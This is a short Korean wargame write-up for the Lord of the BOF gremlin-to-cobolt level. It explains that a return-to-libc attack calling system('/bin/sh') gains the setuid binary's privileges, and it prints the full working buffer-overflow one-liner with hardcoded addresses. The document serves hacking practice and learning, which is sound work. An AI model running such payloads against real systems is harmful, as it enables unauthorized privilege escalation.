[LOB] gremlin

show chown

cobolt를 통하여 쉘을 따면 cobolt 권한을 얻을 수 있다

 

cobolt.c

gremlin과 달라진 점은 buffer의 크기가 256에서 16으로 줄었다는 점 뿐이다

 

고로 gremlin 공격 계획과 다르지 않다

마찬가지로 RTL 기법을 이용하여 system("/bin/sh")를 실행시키면 된다

 

 

./cobolt `python -c 'print "A" * (16+4) + "\xe0\x8a\x05\x40" + "A" * 4 + "\xf9\xbf\x0f\x40"'`

 

success

 

 

RTL 기법을 100프로 알고 쓴다는 느낌이 안 들어서 (개념 자체는 쉽지만..)

관련해서 정리하는 글도 적어볼 예정